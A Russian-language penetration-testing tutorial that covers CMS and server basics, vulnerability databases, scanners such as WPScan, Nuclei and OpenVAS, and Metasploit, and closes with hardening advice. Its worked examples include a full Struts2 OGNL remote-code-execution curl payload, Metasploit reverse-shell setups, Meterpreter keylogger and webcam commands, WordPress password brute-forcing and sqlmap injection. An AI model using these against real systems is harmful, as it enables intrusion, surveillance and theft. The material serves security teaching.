При разработке веб-приложений разработчики допускают множество ошибок — как логических, так и технических. Эти ошибки могут возникать из-за различных факторов:
- Сжатые сроки разработки
- Недостаточная квалификация команды
- Отсутствие надлежащего контроля качества
- Проблемы коммуникации в команде
- Невнимательность
- Использование устаревших библиотек и фреймворков
Ошибки накапливаются и превращаются в уязвимости, которые затем эксплуатируются злоумышленниками. Ежедневно эксперты по безопасности и злоумышленники находят критические уязвимости в различных продуктах.
Важный принцип: чем старее версия приложения, тем больше вероятность наличия известных уязвимостей.
Основные компоненты веб-инфраструктуры
CMS (Системы управления контентом)
CMS (Content Management System) — программная система для управления содержимым веб-сайта. Основные функции:
- Создание, редактирование и удаление контента
- Управление правами доступа пользователей
- Организация структуры сайта
- Управление медиафайлами
Популярные CMS (по состоянию на 2024 год)
| CMS | Доля рынка | Особенности |
|---|---|---|
| WordPress | ~43% всех сайтов | Наиболее популярная, огромная экосистема плагинов |
| Shopify | ~4.4% | Специализируется на e-commerce |
| Wix | ~2.6% | Конструктор сайтов |
| Squarespace | ~2.3% | Дизайн-ориентированная платформа |
| Joomla | ~2.0% | Гибкая, но сложнее WordPress |
| Drupal | ~1.6% | Мощная, для сложных проектов |
Примечание: WordPress, будучи самой популярной CMS, также является наиболее частой целью атак из-за своего распространения.
Основные типы CMS
- Блоговые платформы: WordPress, Ghost, Medium
- E-commerce: Magento, PrestaShop, OpenCart, WooCommerce
- Корпоративные: Drupal, TYPO3, Bitrix
- Форумы: phpBB, vBulletin, XenForo
Web-серверы
Web-сервер — программа, принимающая HTTP-запросы от клиентов и возвращающая им ответы, обычно в виде HTML-страниц, изображений или других ресурсов.
Популярные веб-серверы (2024)
| Сервер | Доля рынка | Порты по умолчанию |
|---|---|---|
| Nginx | ~34% | 80, 443 |
| Apache | ~31% | 80, 443 |
| Cloudflare Server | ~22% | 80, 443 |
| LiteSpeed | ~12% | 80, 443 |
| Microsoft IIS | ~6% | 80, 443 |
Особенности серверов
- Nginx: Высокая производительность, эффективная работа со статикой, часто используется как обратный прокси
- Apache: Гибкая конфигурация через .htaccess, большое количество модулей
- LiteSpeed: Коммерческий сервер с высокой производительностью, совместимый с Apache
- Caddy: Современный сервер с автоматическим HTTPS
FTP-серверы
FTP (File Transfer Protocol) — протокол передачи файлов. Используется для удаленного управления файлами на сервере.
Порт по умолчанию: 21 (управление), 20 (передача данных)
Основные уязвимости FTP
- Передача данных в открытом виде — учетные данные и файлы не шифруются
- Brute-force атаки — подбор паролей
- Анонимный доступ — неправильно настроенный анонимный вход
- Bounce-атаки — использование FTP-сервера для сканирования других хостов
- DDoS — отказ в обслуживании
Альтернативы FTP
- SFTP (SSH File Transfer Protocol) — защищенная передача через SSH
- FTPS (FTP Secure) — FTP с поддержкой TLS/SSL
- SCP (Secure Copy Protocol) — копирование файлов через SSH
Рекомендация: Используйте SFTP вместо обычного FTP для защиты данных.
SSH
SSH (Secure Shell) — криптографический сетевой протокол для безопасного удаленного управления системами и передачи данных.
Порт по умолчанию: 22
Возможности SSH
- Удаленное выполнение команд
- Передача файлов (SFTP, SCP)
- Туннелирование портов (port forwarding)
- X11 forwarding (запуск графических приложений)
- SOCKS-прокси
Популярные SSH-клиенты
- OpenSSH (Linux, macOS, Windows 10+)
- PuTTY (Windows)
- MobaXterm (Windows, расширенный функционал)
- Termius (кроссплатформенный, удобный интерфейс)
Популярные SSH-серверы
- OpenSSH (стандарт для Unix-систем)
- Dropbear (легковесный для встраиваемых систем)
- Tectia SSH (коммерческое решение)
Рекомендации по безопасности SSH
- Использовать ключи вместо паролей
- Отключить root-доступ
- Изменить стандартный порт
- Использовать fail2ban для защиты от brute-force
- Ограничить доступ по IP через firewall
- Использовать многофакторную аутентификацию
Базы данных уязвимостей
Exploit-DB
Exploit-DB (https://www.exploit-db.com/) — крупнейшая общедоступная база данных эксплойтов и уязвимостей.
Основная информация в базе
| Поле | Описание |
|---|---|
| Date | Дата публикации эксплойта |
| D | Кнопка загрузки файла эксплойта |
| A | Доступность уязвимого приложения |
| V | Статус верификации эксплойта |
| Title | Название и описание |
| Type | Тип эксплойта (Remote/Local/WebApp/DoS/Shellcode) |
| Platform | Целевая платформа |
| Author | Автор эксплойта |
Типы эксплойтов
- Remote Exploit — удаленная эксплуатация
- Web Application — уязвимости веб-приложений
- Local Exploit — локальная эксплуатация
- Privilege Escalation — повышение привилегий
- DoS (Denial of Service) — отказ в обслуживании
- Shellcode — вредоносный код
- Papers — исследовательские статьи
Использование локальной версии (searchsploit)
# Поиск эксплойта для Joomla 3.7.0
searchsploit joomla 3.7.0
# Просмотр содержимого эксплойта
searchsploit -x /path/to/exploit
# Копирование эксплойта в текущую директорию
searchsploit -m 42033
# Обновление базы данных
searchsploit -u
Интеграция с Metasploit
Многие эксплойты из Exploit-DB можно использовать в Metasploit Framework:
# Скачать эксплойт с пометкой Metasploit
# Поместить в директорию:
~/.msf4/modules/exploits/
# Или в системную директорию:
/usr/share/metasploit-framework/modules/exploits/
# Обновить кэш модулей в msfconsole
reload_all
Vulners
Vulners.com — агрегатор информации о уязвимостях из множества источников:
- CVE (Common Vulnerabilities and Exposures)
- Exploit-DB
- Metasploit modules
- Различные security advisories
- Bug bounty отчеты
Преимущества Vulners:
- Единая точка поиска по всем базам
- API для автоматизации
- Интеграция с различными сканерами
- Актуальная информация о патчах
Сканирование на уязвимости
Общие принципы
Сканирование на уязвимости — начальный этап тестирования на проникновение. Процесс включает:
- Разведка — определение целей, портов, сервисов
- Идентификация — определение версий ПО
- Сканирование — поиск известных уязвимостей
- Приоритизация — оценка критичности найденных проблем
- Верификация — проверка наличия уязвимости
- Отчетность — документирование результатов
Этапы работы со сканером
Подготовка → Настройка → Сканирование → Анализ → Эксплуатация → Отчет
OpenVAS/GVM
OpenVAS (Open Vulnerability Assessment System), теперь известный как Greenbone Vulnerability Manager (GVM) — мощный фреймворк для сканирования уязвимостей с открытым исходным кодом.
Установка GVM в Kali Linux
# Установка
sudo apt update
sudo apt install gvm
# Настройка
sudo gvm-setup
# Запуск
sudo gvm-start
# Получение учетных данных
sudo gvm-feed-update
Веб-интерфейс доступен по адресу: https://localhost:9392
Основные компоненты GVM
- GVMd — центральный демон управления
- OpenVAS Scanner — движок сканирования
- Greenbone Security Assistant (GSA) — веб-интерфейс
- NVT Feed — база данных тестов уязвимостей (более 80,000 проверок)
Создание задачи сканирования
- Configuration → Targets — создать цель сканирования
- Scans → Tasks — создать задачу
- Выбрать тип сканирования:
- Full and fast — оптимален для большинства случаев
- Full and very deep — максимально подробное сканирование
- System Discovery — обнаружение систем
- Запустить сканирование
- Scans → Reports — просмотр результатов
Интерпретация результатов
Уязвимости классифицируются по уровню угрозы:
| Уровень | Оценка CVSS | Цвет | Действия |
|---|---|---|---|
| Critical | 9.0-10.0 | Фиолетовый | Немедленное исправление |
| High | 7.0-8.9 | Красный | Приоритетное исправление |
| Medium | 4.0-6.9 | Оранжевый | Плановое исправление |
| Low | 0.1-3.9 | Голубой | Информационное |
| Log | 0.0 | Серый | Для сведения |
Эксплуатация уязвимостей с Metasploit
Metasploit Framework — мощнейший инструмент для тестирования на проникновение и разработки эксплойтов.
Основные команды Metasploit
# Запуск консоли
msfconsole
# Поиск модулей
search struts
search type:exploit platform:linux
# Получение информации о модуле
info exploit/multi/http/struts2_content_type_ognl
# Использование модуля
use exploit/multi/http/struts2_content_type_ognl
# Просмотр опций
show options
show payloads
show targets
# Установка параметров
set RHOSTS 192.168.1.100
set RPORT 8080
set LHOST 192.168.1.50
set LPORT 4444
# Выбор payload
set payload linux/x64/meterpreter/reverse_tcp
# Проверка настроек
check
# Запуск эксплойта
exploit
# или
run
# Работа с сессиями
sessions -l # Список активных сессий
sessions -i 1 # Подключиться к сессии 1
sessions -k 1 # Завершить сессию 1
Пример: Эксплуатация Apache Struts2 (CVE-2017-5638)
msfconsole
use exploit/multi/http/struts2_content_type_ognl
set RHOSTS target.example.com
set RPORT 8080
set TARGETURI /showcase.action
set payload linux/x64/meterpreter/reverse_tcp
set LHOST 192.168.1.50
set LPORT 4444
check # Проверить уязвимость
exploit # Запустить эксплойт
Основные Payloads
Reverse Shell Payloads (обратное подключение)
windows/meterpreter/reverse_tcp
linux/x64/meterpreter/reverse_tcp
php/meterpreter/reverse_tcp
java/meterpreter/reverse_tcp
python/meterpreter/reverse_tcp
Bind Shell Payloads (прямое подключение)
windows/meterpreter/bind_tcp
linux/x64/meterpreter/bind_tcp
Команды Meterpreter
# Системная информация
sysinfo
getuid
ps
# Навигация
pwd
cd /path/to/directory
ls
cat file.txt
download file.txt
upload file.txt
# Повышение привилегий
getsystem
getprivs
# Снимок экрана (Windows)
screenshot
# Запись с веб-камеры
webcam_snap
webcam_stream
# Перехват ввода клавиатуры
keyscan_start
keyscan_dump
keyscan_stop
# Переход в shell
shell
Сканеры для CMS
WPScan (WordPress)
WPScan — специализированный сканер безопасности для WordPress, написанный на Ruby.
Установка и обновление
# Установка (обычно предустановлен в Kali)
sudo gem install wpscan
# Обновление
wpscan --update
# Обновление базы данных
wpscan --update
Базовое использование
# Простое сканирование
wpscan --url https://target.com
# Агрессивное обнаружение плагинов
wpscan --url https://target.com --enumerate ap
# Обнаружение уязвимых плагинов (требуется API токен)
wpscan --url https://target.com --enumerate vp --api-token YOUR_TOKEN
# Обнаружение тем
wpscan --url https://target.com --enumerate t
# Обнаружение пользователей
wpscan --url https://target.com --enumerate u
# Комплексное сканирование
wpscan --url https://target.com --enumerate ap,at,u --api-token YOUR_TOKEN
Получение API токена
- Зарегистрироваться на https://wpscan.com/register
- Получить бесплатный токен (до 25 запросов в день)
- Для расширенного использования — платная подписка
Режимы обнаружения
| Флаг | Описание |
|---|---|
vp | Уязвимые плагины |
ap | Все плагины |
p | Популярные плагины |
vt | Уязвимые темы |
at | Все темы |
t | Популярные темы |
u | Пользователи (ID 1-10) |
u[1-100] | Пользователи (ID 1-100) |
m | Медиафайлы |
Брутфорс WordPress
# Брутфорс с wordlist
wpscan --url https://target.com \
--enumerate u \
--passwords /usr/share/wordlists/rockyou.txt
# Брутфорс конкретного пользователя
wpscan --url https://target.com \
--username admin \
--passwords /usr/share/wordlists/rockyou.txt
# С ограничением по времени между запросами
wpscan --url https://target.com \
--username admin \
--passwords wordlist.txt \
--throttle 3000
Продвинутые опции
# Использование прокси
wpscan --url https://target.com --proxy http://127.0.0.1:8080
# Игнорирование SSL сертификатов
wpscan --url https://target.com --disable-tls-checks
# Случайный User-Agent
wpscan --url https://target.com --random-user-agent
# Вывод в файл
wpscan --url https://target.com --output result.txt
wpscan --url https://target.com --format json --output result.json
Joomscan (Joomla)
Joomscan — сканер безопасности для Joomla CMS, написанный на Perl.
Установка
# Клонирование репозитория
git clone https://github.com/OWASP/joomscan.git
cd joomscan
# Или через пакетный менеджер в Kali
sudo apt install joomscan
Использование
# Базовое сканирование
joomscan -u https://target.com
# Обнаружение компонентов
joomscan -u https://target.com --enumerate-components
# Сканирование с перечислением
perl joomscan.pl -u https://target.com -ec
Основные опции
-u, --url URL целевого сайта
-ec Перечисление компонентов
--random-agent Случайный User-Agent
--cookie Установка cookie
--timeout Таймаут запроса
Droopescan (Drupal)
Droopescan — сканер для Drupal, Joomla, и других CMS, написанный на Python.
Установка
# Через pip
pip install droopescan
# Или из исходников
git clone https://github.com/droope/droopescan.git
cd droopescan
pip install -r requirements.txt
Использование
# Сканирование Drupal
droopescan scan drupal -u https://target.com
# Сканирование с перечислением
droopescan scan drupal -u https://target.com -e p,t,u
# Сканирование Joomla
droopescan scan joomla -u https://target.com
# Вывод в JSON
droopescan scan drupal -u https://target.com --output json
Возможности
- Определение версии CMS
- Обнаружение плагинов и тем
- Выявление известных уязвимостей
- Поддержка Drupal, Joomla, Moodle, SilverStripe
CMSmap (универсальный)
CMSmap — универсальный сканер CMS, автоматически определяющий тип системы.
Установка
git clone https://github.com/dionach/CMSmap
cd CMSmap
pip3 install -r requirements.txt
Использование
# Автоопределение и сканирование
python3 cmsmap.py https://target.com
# Полное сканирование
python3 cmsmap.py -F https://target.com
# Сканирование WordPress
python3 cmsmap.py -t wordpress https://target.com
# Брутфорс
python3 cmsmap.py https://target.com -u admin -p wordlist.txt
# Эксплуатация
python3 cmsmap.py https://target.com -o exploit.txt
Поддерживаемые CMS
- WordPress
- Joomla
- Drupal
- Moodle
Современные сканеры уязвимостей
Nikto
Nikto — классический сканер веб-серверов с открытым исходным кодом.
Установка
# Обычно предустановлен в Kali
sudo apt install nikto
# Обновление
nikto -update
Использование
# Базовое сканирование
nikto -h https://target.com
# Сканирование на конкретном порту
nikto -h target.com -p 8080
# Сканирование с SSL
nikto -h https://target.com -ssl
# Использование прокси
nikto -h target.com -useproxy http://proxy:8080
# Вывод в файл
nikto -h target.com -o report.html -Format html
# Тихий режим
nikto -h target.com -Display V
# Агрессивное сканирование с плагинами
nikto -h target.com -Plugins all
Основные проверки Nikto
- Устаревшие версии серверов и приложений
- Опасные файлы и директории
- Неправильные конфигурации
- Небезопасные файлы и скрипты
- Проверка robots.txt
- Утечки информации в заголовках
Nuclei
Nuclei — современный быстрый сканер на основе шаблонов YAML, разработанный ProjectDiscovery.
Установка
# Установка через GO
GO111MODULE=on go install -v github.com/projectdiscovery/nuclei/v3/cmd/nuclei@latest
# Или скачать бинарный файл
wget https://github.com/projectdiscovery/nuclei/releases/latest/download/nuclei_linux_amd64.zip
unzip nuclei_linux_amd64.zip
sudo mv nuclei /usr/local/bin/
# Обновление шаблонов
nuclei -update-templates
Базовое использование
# Сканирование одной цели
nuclei -u https://target.com
# Сканирование списка целей
nuclei -l targets.txt
# Сканирование с конкретными шаблонами
nuclei -u https://target.com -t cves/
nuclei -u https://target.com -t exposures/
# Сканирование по степени критичности
nuclei -u https://target.com -s critical,high
# Вывод результатов в файл
nuclei -u https://target.com -o results.txt
nuclei -u https://target.com -json -o results.json
Категории шаблонов
cves/ - CVE уязвимости
vulnerabilities/ - Общие уязвимости
exposures/ - Утечки информации
misconfiguration/ - Неправильные конфигурации
technologies/ - Обнаружение технологий
default-logins/ - Стандартные логины
file/ - Чувствительные файлы
takeovers/ - Subdomain takeover
iot/ - IoT уязвимости
Продвинутое использование
# Использование своих шаблонов
nuclei -u https://target.com -t ./my-templates/
# Исключение определенных шаблонов
nuclei -u https://target.com -exclude-templates exposures/
# Управление параллелизмом
nuclei -u https://target.com -c 50 # 50 одновременных запросов
# Rate limiting
nuclei -u https://target.com -rl 10 # 10 запросов в секунду
# Использование заголовков
nuclei -u https://target.com -H "Cookie: session=abc123"
# Через прокси
nuclei -u https://target.com -proxy http://127.0.0.1:8080
Создание собственного шаблона
id: example-detection
info:
name: Example Vulnerability Detection
author: username
severity: high
description: Description of vulnerability
tags: cve,wordpress
requests:
- method: GET
path:
- "{{BaseURL}}/wp-admin/admin-ajax.php"
matchers:
- type: word
words:
- "vulnerable string"
part: body
Коммерческие решения
Nessus Professional
Nessus от Tenable — один из самых популярных коммерческих сканеров.
Особенности:
- Более 170,000 плагинов
- Регулярные обновления
- Удобный веб-интерфейс
- Подробная отчетность
- Compliance scanning
Стоимость: От $3,990/год
Acunetix
Специализируется на веб-приложениях.
Особенности:
- DeepScan для одностраничных приложений
- Обнаружение SQLi, XSS, XXE и других уязвимостей
- Интеграция с CI/CD
- AcuMonitor для выявления blind XSS
Стоимость: От $4,500/год
Qualys Web Application Scanning
Облачное решение для сканирования веб-приложений.
Особенности:
- Масштабируемость
- Интеграция с облачными платформами
- Continuous monitoring
- Соответствие стандартам (PCI DSS, HIPAA)
Burp Suite Professional
Особенности:
- Мощный сканер веб-приложений
- Интерактивное тестирование
- Расширяемость через BApp Store
- Обязательный инструмент для пентестеров
Стоимость: $449/год
RedCheck (российское решение)
Первый отечественный сертифицированный сканер.
Особенности:
- Соответствие требованиям регуляторов РФ
- Сканирование СУБД и систем виртуализации
- Контроль соответствия стандартам
- Патч-менеджмент
Практические примеры
Пример 1: Обнаружение и эксплуатация PHP CGI Argument Injection
Шаг 1: Сканирование с OpenVAS
Результат: PHP CGI Argument Injection (CVE-2012-1823)
Уязвимые версии: PHP 5.3.13 - 5.4.3 в режиме CGI
Шаг 2: Ручная проверка
curl "http://target.com/index.php?-s"
Если выводится исходный код PHP — уязвимость подтверждена.
Шаг 3: Эксплуатация через Metasploit
msfconsole
use exploit/multi/http/php_cgi_arg_injection
set RHOSTS target.com
set RPORT 80
set TARGETURI /index.php
set payload php/meterpreter/reverse_tcp
set LHOST attacker_ip
set LPORT 4444
exploit
Пример 2: Apache Struts2 RCE (CVE-2017-5638)
Обнаружение через Nuclei
nuclei -u http://target.com:8080 -t cves/2017/CVE-2017-5638.yaml
Ручная эксплуатация через curl
curl -X POST http://target.com:8080/showcase.action \
-H "Content-Type: %{(#_='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='id').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}"
Эксплуатация через Metasploit
use exploit/multi/http/struts2_content_type_ognl
set RHOSTS target.com
set RPORT 8080
set TARGETURI /showcase.action
set payload linux/x64/meterpreter/reverse_tcp
set LHOST attacker_ip
exploit
Пример 3: WordPress Plugin SQL Injection
Обнаружение с WPScan
wpscan --url https://target.com \
--enumerate vp \
--api-token YOUR_TOKEN
Результат:
[!] mail-masta 1.0
- https://wpscan.com/vulnerability/51365dcf-4338-4d45-acb9-4d0d-bf14-75ff
- SQL Injection
Эксплуатация с SQLMap
sqlmap -u "http://target.com/wp-content/plugins/mail-masta/inc/campaign/count_of_send.php?pl_id=1" \
--dbs \
--batch \
--random-agent
Выводы и рекомендации
Для тестировщиков безопасности
- Используйте несколько инструментов — ни один сканер не находит все уязвимости
- Обновляйте инструменты — регулярно обновляйте базы данных уязвимостей
- Верифицируйте результаты — автоматические сканеры дают ложные срабатывания
- Документируйте процесс — ведите подробные записи для отчетности
- Следуйте правилам — всегда получайте разрешение перед сканированием
Для разработчиков и администраторов
- Регулярно обновляйте ПО — устанавливайте security patches своевременно
- Минимизируйте атакующую поверхность:
- Отключайте неиспользуемые сервисы
- Удаляйте ненужные плагины и темы
- Закрывайте неиспользуемые порты
- Используйте принцип наименьших привилегий
- Проводите регулярные аудиты безопасности
- Мониторьте логи — настройте централизованное логирование
- Внедрите WAF — используйте Web Application Firewall
- Обучайте команду — проводите тренинги по безопасности
Защита от сканеров
Меры противодействия
- Rate limiting — ограничение количества запросов
- IDS/IPS — системы обнаружения и предотвращения вторжений (Snort, Suricata)
- Fail2Ban — автоматическая блокировка по IP при подозрительной активности
- Скрытие версий ПО:
# Nginx server_tokens off;# Apache ServerTokens Prod ServerSignature Off - Изменение стандартных путей — измените пути к админ-панели
- CAPTCHA — на страницах входа
- Honeypots — ловушки для выявления сканирования
Лучшие практики
Для WordPress
- Использовать последнюю версию
- Удалить стандартного пользователя
admin - Ограничить попытки входа (Limit Login Attempts)
- Использовать security плагины (Wordfence, Sucuri)
- Отключить XML-RPC если не используется
- Скрыть версию WordPress
- Регулярно делать бэкапы
Для любой CMS
- Использовать сложные пароли
- Включить двухфакторную аутентификацию
- Регулярно проверять и обновлять плагины
- Удалять неиспользуемые расширения
- Настроить правильные права доступа к файлам
- Использовать HTTPS
- Настроить Content Security Policy (CSP)
- Регулярно проверять наличие backdoors
Полезные ресурсы
Базы данных уязвимостей
- https://www.exploit-db.com/
- https://vulners.com/
- https://nvd.nist.gov/
- https://cve.mitre.org/
- https://www.cvedetails.com/
Обучающие ресурсы
- https://www.hackerone.com/hacktivity
- https://portswigger.net/web-security
- https://owasp.org/
- https://www.offensive-security.com/
- https://tryhackme.com/
- https://www.hackthebox.com/
Инструменты
- https://github.com/projectdiscovery/nuclei
- https://github.com/wpscanteam/wpscan
- https://www.metasploit.com/
- https://github.com/sullo/nikto
- https://www.openvas.org/
Заключение
Системные уязвимости веб-приложений остаются одной из основных векторов атак. Регулярное сканирование, своевременное обновление ПО и следование лучшим практикам безопасности — ключевые факторы защиты веб-инфраструктуры.
Помните: безопасность — это не одноразовое действие, а непрерывный процесс.